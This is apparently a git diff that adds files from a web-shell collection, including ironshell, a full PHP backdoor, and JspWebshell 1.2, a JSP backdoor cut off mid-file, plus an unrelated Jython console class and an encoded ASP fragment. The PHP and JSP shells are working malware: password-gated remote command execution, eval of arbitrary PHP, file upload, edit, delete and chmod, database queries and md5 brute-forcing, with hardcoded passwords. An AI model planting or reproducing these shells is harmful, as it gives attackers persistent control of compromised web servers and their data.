+<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
+<%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
diff --git a/138shell/I/ironshell.txt b/138shell/I/ironshell.txt
new file mode 100644
index 0000000..b6931f1
--- /dev/null
+++ b/138shell/I/ironshell.txt
@@ -0,0 +1,588 @@
+<?php
+error_reporting(0); //If there is an error, we'll show it, k?
+
+$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
+
+$me = basename(__FILE__);
+$cookiename = "wieeeee";
+
+
+if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
+{
+
+    if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
+    {
+        $_POST['pass'] = md5($_POST['pass']);
+    }
+
+    if($_POST['pass'] == $password)
+    {
+            setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
+    }
+    reload();
+}
+
+
+
+if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
+{
+    login();
+    die();
+}
+//
+//Do not cross this line! All code placed after this block can't be executed without being logged in!
+//
+
+if(isset($_GET['p']) && $_GET['p'] == "logout")
+{
+setcookie ($cookiename, "", time() - 3600);
+reload();
+}
+if(isset($_GET['dir']))
+{
+    chdir($_GET['dir']);
+}
+
+
+$pages = array(
+    'cmd' => 'Execute Command',
+    'eval' => 'Evaluate PHP',
+    'mysql' => 'MySQL Query',
+    'chmod' => 'Chmod File',
+    'phpinfo' => 'PHPinfo',
+    'md5' => 'md5 cracker',
+    'headers' => 'Show headers',
+    'logout' => 'Log out'
+);
+
+//The header, like it?
+$header = '<html>
+<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
+<head>
+<style>
+td {
+    font-size: 12px; 
+    font-family: verdana;
+    color: #33FF00;
+    background: #000000;
+}
+
+#d {
+    background: #003000;
+}
+#f {
+    background: #003300;
+}
+#s {
+    background: #006300;
+}
+#d:hover
+{
+    background: #003300;
+}
+#f:hover
+{
+    background: #003000;
+}
+pre {
+    font-size: 10px; 
+    font-family: verdana;
+    color: #33FF00;
+}
+a:hover {
+text-decoration: none;
+}
+
+
+input,textarea,select {
+    border-top-width: 1px; 
+    font-weight: bold; 
+    border-left-width: 1px; 
+    font-size: 10px; 
+    border-left-color: #33FF00; 
+    background: #000000; 
+    border-bottom-width: 1px; 
+    border-bottom-color: #33FF00; 
+    color: #33FF00; 
+    border-top-color: #33FF00; 
+    font-family: verdana; 
+    border-right-width: 1px; 
+    border-right-color: #33FF00;
+}
+
+hr {
+color: #33FF00;
+background-color: #33FF00;
+height: 5px;
+}
+
+</style>
+
+</head>
+<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
+<table width=100%><td id="header" width=100%>
+<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
+
+foreach($pages as $page => $page_name)
+{
+    $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
+
+}
+$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
+print $header;
+
+$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
+
+
+//
+//Page handling
+//
+if(isset($_REQUEST['p']))
+{
+        switch ($_REQUEST['p']) {
+            
+            case 'cmd': //Run command
+                
+                print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
+                    if(isset($_REQUEST['command']))
+                    {
+                        print "<pre>";
+                        execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
+                    }
+            break;
+            
+            
+            case 'edit': //Edit a fie
+                if(isset($_POST['editform']))
+                {
+                    $f = $_GET['file'];
+                    $fh = fopen($f, 'w') or print "Error while opening file!";
+                    fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
+                    fclose($fh);
+                }
+                print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
+                
+                if(file_exists($_GET['file']))
+                {
+                    $rd = file($_GET['file']);
+                    foreach($rd as $l)
+                    {
+                        print htmlspecialchars($l);
+                    }
+                }
+                
+                print "</textarea><input type=submit value=\"Save\"></form>";
+                
+            break;
+            
+            case 'delete': //Delete a file
+            
+                if(isset($_POST['yes']))
+                {
+                    if(unlink($_GET['file']))
+                    {
+                        print "File deleted successfully.";
+                    }
+                    else
+                    {
+                        print "Couldn't delete file.";
+                    }
+                }
+                
+                
+                if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
+                {
+                    print "Are you sure you want to delete ".$_GET['file']."?<br>
+                    <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
+                    <input type=hidden name=yes value=yes>
+                    <input type=submit value=\"Delete\">
+                    ";
+                }
+            
+            
+            break;
+            
+            
+            case 'eval': //Evaluate PHP code
+            
+                print "<form action=\"".$me."?p=eval\" method=POST>
+                <textarea cols=60 rows=10 name=\"eval\">";
+                if(isset($_POST['eval']))
+                {
+                    print htmlspecialchars($_POST['eval']);
+                }
+                else
+                {
+                    print "print \"Yo Momma\";";
+                }
+                print "</textarea><br>
+                <input type=submit value=\"Eval\">
+                </form>";
+                
+                if(isset($_POST['eval']))
+                {
+                    print "<h1>Output:</h1>";
+                    print "<br>";
+                    eval($_POST['eval']);
+                }
+            
+            break;
+            
+            case 'chmod': //Chmod file
+                
+                
+                print "<h1>Under construction!</h1>";
+                if(isset($_POST['chmod']))
+                {
+                switch ($_POST['chvalue']){
+                    case 777:
+                    chmod($_POST['chmod'],0777);
+                    break;
+                    case 644:
+                    chmod($_POST['chmod'],0644);
+                    break;
+                    case 755:
+                    chmod($_POST['chmod'],0755);
+                    break;
+                }
+                print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
+                }
+                if(isset($_GET['file']))
+                {
+                    $content = urldecode($_GET['file']);
+                }
+                else
+                {
+                    $content = "file/path/please";
+                }
+                
+                print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
+                <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
+                <select name=\"chvalue\">
+<option value=\"777\">777</option>
+<option value=\"644\">644</option>
+<option value=\"755\">755</option>
+</select><input type=submit value=\"Change\">";
+                
+            break;
+            
+            case 'mysql': //MySQL Query
+            
+            if(isset($_POST['host']))
+            {
+                $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
+                mysql_select_db($_POST['dbase']);
+                $sql = $_POST['query'];
+                
+                
+                $result = mysql_query($sql);
+                
+            }
+            else
+            {
+                print "
+                This only queries the database, doesn't return data!<br>
+                <form action=\"".$me."?p=mysql\" method=POST>
+                <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
+                <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
+                <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
+                <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
+                
+                <b>Query:<br></b<textarea name=query></textarea>
+                <input type=submit value=\"Query database\">
+                </form>
+                ";
+                
+            }
+            
+            break;
+            
+            case 'createdir':
+            if(mkdir($_GET['crdir']))
+            {
+            print 'Directory created successfully.';
+            }
+            else
+            {
+            print 'Couldn\'t create directory';
+            }
+            break;
+            
+            
+            case 'phpinfo': //PHP Info
+                phpinfo();
+            break;
+            
+            
+            case 'rename':
+            
+                if(isset($_POST['fileold']))
+                {
+                    if(rename($_POST['fileold'],$_POST['filenew']))
+                    {
+                        print "File renamed.";
+                    }
+                    else
+                    {
+                        print "Couldn't rename file.";
+                    }
+                    
+                }
+                if(isset($_GET['file']))
+                {
+                    $file = basename(htmlspecialchars($_GET['file']));
+                }
+                else
+                {
+                    $file = "";
+                }
+                
+                print "Renaming ".$file." in folder ".realpath('.').".<br>
+                                <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
+                    <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
+                    <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
+                    <input type=submit value=\"Rename file\">
+                    </form>";
+            break;
+            
+            case 'md5':
+            if(isset($_POST['md5']))
+            {
+            if(!is_numeric($_POST['timelimit']))
+            {
+            $_POST['timelimit'] = 30;
+            }
+            set_time_limit($_POST['timelimit']);
+                if(strlen($_POST['md5']) == 32)
+                {
+                    
+                        if($_POST['chars'] == "9999")
+                        {
+                        $i = 0;
+                        while($_POST['md5'] != md5($i) && $i != 100000)
+                            {
+                                $i++;
+                            }
+                        }
+                        else
+                        {
+                            for($i = "a"; $i != "zzzzz"; $i++)
+                            {
+                                if(md5($i == $_POST['md5']))
+                                {
+                                    break;
+                                }
+                            }
+                        }
+
+                    
+                    if(md5($i) == $_POST['md5'])
+                    {
+                            print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
+                    }
+                    
+                }
+                
+            }
+            
+            print "Will bruteforce the md5
+                <form action=\"".$me."?p=md5\" method=POST>
+                <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
+                <b>Characters:</b><br><select name=\"chars\">
+                <option value=\"az\">a - zzzzz</option>
+                <option value=\"9999\">1 - 9999999</option>
+                </select>
+                <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
+                <input type=submit value=\"Bruteforce md5\">
+                </form><br>*: if set_time_limit is allowed by php.ini";
+            break;
+            
+            case 'headers':
+            foreach(getallheaders() as $header => $value)
+            {
+            print htmlspecialchars($header . ":" . $value)."<br>";
+            
+            }
+            break;
+        }
+
+}
+else //Default page that will be shown when the page isn't found or no page is selected.
+{
+    
+    $files = array();
+    $directories = array();
+    
+    if(isset($_FILES['uploadedfile']['name']))
+{
+    $target_path = realpath('.').'/';
+    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+
+    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+        print "File:".  basename( $_FILES['uploadedfile']['name']). 
+        " has been uploaded";
+    } else{
+        echo "File upload failed!";
+    }
+}
+
+
+    
+    
+    
+    print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
+    if ($handle = opendir('.'))
+    {
+        while (false !== ($file = readdir($handle))) 
+        {
+              if(is_dir($file))
+              {
+                $directories[] = $file;
+              }
+              else
+              {
+                $files[] = $file;
+              }
+        }
+    asort($directories);
+    asort($files);
+        foreach($directories as $file)
+        {
+            print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+        
+        foreach($files as $file)
+        {
+            print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+    }
+    else
+    {
+        print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
+    }
+    
+    print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
+<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
+<input type=\"submit\" value=\"Upload File\" />
+</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
+<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
+</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
+</table>";
+
+
+}
+
+
+function login()
+{
+    print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
+    <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
+    <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
+    </form>";
+}
+function reload()
+{
+    header("Location: ".basename(__FILE__));
+}
+
+function get_execution_method()
+{
+    if(function_exists('passthru')){ $m = "passthru"; }
+    if(function_exists('exec')){ $m = "exec"; }
+    if(function_exists('shell_exec')){ $m = "shell_ exec"; }
+    if(function_exists('system')){ $m = "system"; }
+    if(!isset($m)) //No method found :-|
+    {
+        $m = "Disabled";
+    }
+    return($m);
+}
+
+function execute_command($method,$command)
+{
+    if($method == "passthru")
+    {
+        passthru($command);
+    }
+    
+    elseif($method == "exec")
+    {
+        exec($command,$result);
+        foreach($result as $output)
+        {
+            print $output."<br>";
+        }
+    }
+    
+    elseif($method == "shell_exec")
+    {
+        print shell_exec($command);
+    }
+    
+    elseif($method == "system")
+    {
+        system($command);
+    }
+
+}
+
+function perm($file)
+{
+    if(file_exists($file))
+    {
+        return substr(sprintf('%o', fileperms($file)), -4);
+    }
+    else
+    {
+        return "????";
+    }
+}
+
+function get_color($file)
+{
+if(is_writable($file)) { return "green";}
+if(!is_writable($file) && is_readable($file)) { return "white";}
+if(!is_writable($file) && !is_readable($file)) { return "red";}
+
+
+
+}
+
+function show_dirs($where)
+{
+    if(ereg("^c:",realpath($where)))
+    {
+    $dirparts = explode('\\',realpath($where));
+    }
+    else
+    {
+    $dirparts = explode('/',realpath($where));
+    }
+    
+    
+    
+    $i = 0;
+    $total = "";
+    
+    foreach($dirparts as $part)
+    {
+        $p = 0;
+        $pre = "";
+        while($p != $i)
+        {
+            $pre .= $dirparts[$p]."/";
+            $p++;
+            
+        }
+        $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
+        $i++;
+    }
+    
+    return "<h2>".$total."</h2><br>";
+
+}
+print $footer;
+
+// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
+exit();
+?>
diff --git a/138shell/J/Java Shell.js.txt b/138shell/J/Java Shell.js.txt
new file mode 100644
index 0000000..f15e864
--- /dev/null
+++ b/138shell/J/Java Shell.js.txt	
@@ -0,0 +1,125 @@
+package enigma.shells.jython;
+
+import java.io.*;
+import java.awt.*;
+import javax.swing.*;
+
+import enigma.console.*;
+import enigma.console.java2d.*;
+
+import org.python.core.*;
+import org.python.util.*;
+
+public class JythonShell extends JPanel implements Runnable {
+	public static int DEFAULT_ROWS = 20;
+	public static int DEFAULT_COLUMNS = 80;
+	public static int DEFAULT_SCROLLBACK = 100;
+	
+	public PrintStream out;
+	
+	public Console console;
+	public Java2DTextWindow text;
+	public JScrollPane scrollPane;
+	public PythonInterpreter interp;
+	
+	private Color colorBackground = new Color(0, 0, 0);
+	private Color colorForeground = new Color(187, 187, 187);
+	private Color colorError = new Color(187, 0, 0);
+	private Color colorCursor = new Color(187, 187, 0);
+	
+	public JythonShell() {
+		this(null, Py.getSystemState());
+	}
+	
+	public JythonShell(PyObject dict) {
+		this(dict, Py.getSystemState());
+	}
+	
+	public JythonShell(int columns, int rows, int scrollback) {
+		this(null, Py.getSystemState(), columns, rows, scrollback);
+	}
+	
+	public JythonShell(PyObject dict, PySystemState systemState) {
+		this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
+	}
+	
+	public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
+		super(new BorderLayout());
+		
+		text = new Java2DTextWindow(columns, rows, scrollback);
+		text.setBackground(colorBackground);
+		
+		scrollPane = new JScrollPane();
+		scrollPane.setViewportView(text);
+		
+		add(scrollPane, BorderLayout.CENTER);
+		
+		console = new DefaultConsoleImpl(text);
+		out = console.getOutputStream();
+		
+		interp = new PythonInterpreter(dict, systemState);
+		interp.setOut(out);
+		interp.setErr(out);
+	}
+	
+	public void run() {
+		int pos = 0;
+		int tbs = 4;
+		
+		String line = "";
+		String command = "";
+		
+		for (;;) {
+			String space = "";
+			for (int i = 0; i < pos * tbs; i++) {
+				space += " ";
+			}
+			
+			try {
+				console.setTextAttributes(new TextAttributes(colorCursor));
+				
+				if (pos > 0) {
+					out.print(space + "... ");
+				} else {
+					out.print(">> ");
+				}
+				
+				console.setTextAttributes(new TextAttributes(colorForeground));
+				
+				line = console.readLine().trim();
+				if (line.length() == 0 && pos > 0) {
+					pos--;
+				} else if (line.endsWith(":")) {
+					command += space + line + "\n";
+					pos++;
+				} else {
+					command += space + line + "\n";
+				}
+				
+				if (pos == 0) {
+					interp.exec(command);
+					command = "";
+				}
+			} catch (Exception e) {
+				console.setTextAttributes(new TextAttributes(colorError));
+				
+				e.printStackTrace();
+				command = "";
+			}
+		}
+	}
+	
+	public static void main(String[] argv) {
+		PySystemState.initialize(System.getProperties(), null, argv);
+		
+		JFrame frame = new JFrame("Jython Console");
+		JythonShell console = new JythonShell();
+		
+		frame.add(console, BorderLayout.CENTER);
+		frame.pack();
+		frame.setVisible(true);
+		frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
+		
+		console.run();
+	}
+}
\ No newline at end of file
diff --git a/138shell/J/JspWebshell 1.2.txt b/138shell/J/JspWebshell 1.2.txt
new file mode 100644
index 0000000..4ce0fcf
--- /dev/null
+++ b/138shell/J/JspWebshell 1.2.txt	
@@ -0,0 +1,788 @@
+<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
+<%
+/**
+ * <p>Title:JspWebshell </p>
+ *
+ * <p>Description: jspÍøÕ¾¹ÜÀí</p>
+ *
+ * <p>Copyright:¾ø¶ÔÁã¶È[B.C.T] Copyright (c) 2006</p>
+ *
+ * <p>Company: zero.cnbct.org</p>
+ *  PS:±¾³ÌĞòÊÇĞ¡µÜ´¦ÓÚĞËȤËùĞ´£¬ÈçÓĞÒÉÎÊÇëÁªÏµQQ:48124012
+ * @version 1.2
+ */
+ String path="";
+ String selfName="";
+ boolean copyfinish=false;
+%>
+<%  selfName=request.getRequestURI();
+     // String editfile="";
+        String editfile=request.getParameter("editfile");
+		if (editfile!=null)
+		{editfile=new String(editfile.getBytes("ISO8859_1"));
+		}
+	  path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+%>
+<%!    
+    String _password ="111";//ÃÜÂë
+	public String readAllFile(String filePathName) throws IOException 
+	{ 
+	FileReader fr = new FileReader(filePathName); 
+	int count = fr.read();
+	String res="";
+	while(count != -1) 
+	{ 
+	//System.out.print((char)count); 
+		res=res+(char)count;
+	count = fr.read(); 
+	if(count == 13) 
+	{ 
+	fr.skip(1); 
+	} 
+	} 
+	fr.close(); 
+	return res;
+	} 
+public void writeFile(String filePathName,String args) throws IOException 
+{ 
+FileWriter fw = new FileWriter(filePathName); 
+PrintWriter out=new PrintWriter(fw); 
+out.write(args); 
+out.println(); 
+out.flush(); 
+fw.close(); 
+out.close(); 
+} 
+public boolean createFile(String filePathName) throws IOException 
+{ 
+boolean result = false; 
+File file = new File(filePathName); 
+if(file.exists()) 
+{ 
+System.out.println("ÎļşÒѾ­´æÔÚ£¡"); 
+} 
+else 
+{ 
+file.createNewFile(); 
+result = true; 
+System.out.println("ÎļşÒѾ­´´½¨£¡"); 
+} 
+return result; 
+}
+public boolean createFolder(String fileFolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(fileFolderName); 
+if(file.exists()) 
+{ 
+//file.delete(); 
+System.out.println("Ŀ¼ÒѾ­´æÔÚ!"); 
+result = true; 
+} 
+else 
+{ 
+file.mkdir(); 
+System.out.println("Ŀ¼ÒѾ­½¨Á¢!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+}  
+
+public boolean DeleteFolder(String filefolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(filefolderName); 
+if(file.exists()) 
+{ 
+file.delete(); 
+System.out.println("Ŀ¼ÒÑɾ³ı!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+} 
+public boolean validate(String password) {
+	if (password.equals(_password)) {
+		return true;
+	} else {
+		return false;
+	}
+}
+public String HTMLEncode(String str) {
+	str = str.replaceAll(" ", "&nbsp;");
+	str = str.replaceAll("<", "&lt;");
+	str = str.replaceAll(">", "&gt;");
+	str = str.replaceAll("\r\n", "<br>");
+	
+	return str;
+}
+    public String exeCmd(String cmd) {
+	Runtime runtime = Runtime.getRuntime();
+	Process proc = null;
+	String retStr = "";
+	InputStreamReader insReader = null;
+	char[] tmpBuffer = new char[1024];
+	int nRet = 0;
+	
+	try {
+		proc = runtime.exec(cmd);
+		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+			retStr += new String(tmpBuffer, 0, nRet);
+		}
+		
+		insReader.close();
+		retStr = HTMLEncode(retStr);
+	} catch (Exception e) {
+		retStr = "<font color=\"red\">ÃüÁî´íÎó\"" + cmd + "\"";
+	} finally {
+		return retStr;
+	}
+	}
+	public boolean fileCopy(String srcPath, String dstPath) {
+	boolean bRet = true;
+	
+	try {
+		FileInputStream in = new FileInputStream(new File(srcPath));
+		FileOutputStream out = new FileOutputStream(new File(dstPath));
+		byte[] buffer = new byte[1024];
+		int nBytes;
+		
+
+		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+			out.write(buffer, 0, nBytes);
+		}
+		
+		in.close();
+		out.close();
+	} catch (IOException e) {
+		bRet = false;
+	}	
+	
+	return bRet;
+}
+class EnvServlet
+{
+	public long timeUse=0;
+	public Hashtable htParam=new Hashtable();
+	private Hashtable htShowMsg=new Hashtable();
+	public void setHashtable()
+	{
+		Properties me=System.getProperties();
+		Enumeration em=me.propertyNames();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=me.getProperty(strKey);
+			htParam.put(strKey,strValue);
+		}
+	}	
+	public void getHashtable(String strQuery)
+	{
+		Enumeration em=htParam.keys();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=new String();
+			if(strKey.indexOf(strQuery,0)>=0)
+			{
+				strValue=(String)htParam.get(strKey);
+				htShowMsg.put(strKey,strValue);
+			}
+		}
+	}
+	public String queryHashtable(String strKey)
+	{
+		strKey=(String)htParam.get(strKey);
+		return strKey;
+	}
+/*	public long test_int()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		while(i<3000000)i++;
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}
+	public long test_sqrt()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		double db=(double)new Random().nextInt(1000);
+		while(i<200000){db=Math.sqrt(db);i++;}
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}*/
+}
+%>
+<%
+	EnvServlet env=new EnvServlet();
+	env.setHashtable();
+	//String action=new String(" ");
+	//String act=new String("action");
+	//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
+%>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>JspWebShell By ¾ø¶ÔÁã¶È</title>
+<style>
+body {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	background-color: #666666;
+}
+A {
+	COLOR: black; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: black; TEXT-DECORATION: underline; none: 
+}
+td {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	color: #000000;
+}
+
+input.textbox {
+	border: black solid 1;
+	font-size: 12px;
+	height: 18px;
+}
+
+input.button {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	border: black solid 1;
+}
+
+td.datarows {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	height: 25px;
+	color: #000000;
+}
+.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript" type="text/JavaScript">
+<!--
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+//-->
+</script>
+</head>
+<body bgcolor="#666666">
+<%
+//session.setMaxInactiveInterval(_sessionOutTime * 60);
+String password=request.getParameter("password");
+if (password == null && session.getAttribute("password") == null) {
+
+%>
+
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px"> 
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr> 
+      <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr> 
+            <TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell 
+              version 1.2¹ÜÀíµÇ¼ :::...</b></font></TD>
+            <TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By 
+              ¾ø¶ÔÁã¶È</FONT></TD>
+          </tr>
+          <form name="bctform" method="post">
+            <tr bgcolor="#999999"> 
+              <td height="30" colspan="2" align="center" class="td2"> 
+                <input name="password" type="password" class="textbox" id="Textbox" /> 
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> 
+              </td>
+            </tr>
+          </form>
+        </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+
+	} else {
+	
+	if (session.getAttribute("password") == null) {
+		
+		if (validate(password) == false) {
+			out.println("<div align=\"center\"><font color=\"red\"><li>ÃÜÂë´íÎó</font></div>");
+			out.close();
+			return;
+		}
+		
+		session.setAttribute("password", password);
+	} else {
+		password = (String)session.getAttribute("password");
+	}
+%>
+	<%
+		File tmpFile = null;
+		String delfile="";
+		String delfile1="";
+		String editpath="";
+		delfile1=request.getParameter("delfile");
+		editpath=request.getParameter("filepath");
+		if (delfile1!=null)
+		{delfile=new String(delfile1.getBytes("ISO8859_1"));
+		}
+        if ( delfile1!= null) {
+        //  out.print(delfile);
+	    	tmpFile = new File(delfile);
+		if (! tmpFile.delete()) {
+			out.print( "<font color=\"red\">ɾ³ıʧ°Ü</font><br>\n");
+			}
+			}
+%>
+  <%String editfilecontent=null;
+       String editfilecontent1=request.getParameter("content");
+	   // out.println(editfilecontent1);
+		//String save=request.getParameter("save");
+	   if (editfilecontent1!=null)
+	   {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
+          //   out.print(editfile);
+			//out.print(editfilecontent);
+            if (editfile!=null&editfilecontent!=null)
+			{try {writeFile(editfile,editfilecontent);}
+			 catch (Exception e) {out.print("Ğ´Èëʧ°Ü");}
+			 out.print("Ğ´Èë³É¹¦");
